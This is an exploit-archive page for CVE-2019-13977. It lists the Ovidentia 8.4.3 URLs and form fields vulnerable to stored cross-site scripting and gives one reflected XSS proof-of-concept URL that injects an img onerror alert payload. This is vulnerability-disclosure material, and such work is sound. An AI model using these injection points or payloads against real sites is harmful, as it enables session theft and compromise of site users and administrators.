Ovidentia 8.4.3 Cross Site Scripting

Ovidentia 8.4.3 Cross Site Scripting: Posted Jul 24, 2019; Authored by Fernando Pinheiro, Victor Flores; Ovidentia version 8.4.3 suffers from a cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2019-13977; SHA-256 | 734799c00c7a895ec1bfc570d83de3f1eccab1b2b66715089278ee5b39f75a57; Download | Favorite | View

Ovidentia 8.4.3 Cross Site Scripting

#-------------------------------------------------------
# Exploit Title: [ Ovidentia CMS - XSS Ovidentia 8.4.3 ]
# Description: [ The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS. ]
# Date: [ 06/05/2019 ]
# CVE: [ CVE-2019-13977 ]
# Exploit Author:
#     [ Fernando Pinheiro (n3k00n3) ]
#     [ Victor Flores  (UserX) ]
# Vendor Homepage: [
https://www.ovidentia.org/
]
# Version: [ 8.4.3 ]
# Tested on: [ Mac,linux - Firefox, safari ]
# Download: [
http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
]
#
#           [ Kitsun3Sec Research Group ]
#--------------------------------------------------------

POC

>========================================================
                      Stored XSS
>========================================================

1. POST
http://TARGET/ovidentia/index.php?tg=groups
Field:
    nom
2. POST
http://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
Fields:
    Nom
    Description
3. GET
http://TARGET/ovidentia/index.php?tg=delegat
Show groups
4. POST
http://TARGET/ovidentia/index.php?tg=site&idx=create

http://TARGET/ovidentia/index.php?tg=site&item=4
Fields:
    Nom
    address
    description
5. POST
http://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1
Fields:
    Libellé du champ
  Explosion:
http://TARGET/ovidentia/index.php?tg=forums&idx=notices

http://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1

http://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1
6. POST
http://TARGET/ovidentia/index.php?tg=notes&idx=Create
Fields: Notes
  Explosion:
http://TARGET/ovidentia/index.php?tg=notes&idx=List
7. POST
http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add
Fields: all
  Explosion:
http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2
>========================================================
                    REFLECTED
>========================================================

1. GET
http://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E

Sent from [ProtonMail](https://protonmail.com), encrypted email based in Switzerland.

Top Authors In Last 30 Days

Red Hat 227 files
indoushka 136 files
Ubuntu 64 files
Gentoo 33 files
Jay Turla 29 files
Debian 27 files
sinn3r 12 files
joev 11 files
Kris Katterjohn 11 files
h00die 10 files

File Archives

Systems

AIX (429)
Apple (2,103)
BSD (377)
CentOS (58)
Cisco (1,932)
Debian (7,112)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (382)
iPhone (108)
IRIX (220)
Juniper (70)
Linux (50,949)
Mac OS X (692)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,659)
Slackware (941)
Solaris (1,612)
SUSE (1,444)
Ubuntu (9,785)
UNIX (9,443)
UnixWare (187)
Windows (6,698)
Other

Ovidentia 8.4.3 Cross Site Scripting

Ovidentia 8.4.3 Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Ovidentia 8.4.3 Cross Site Scripting

Share This

Ovidentia 8.4.3 Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems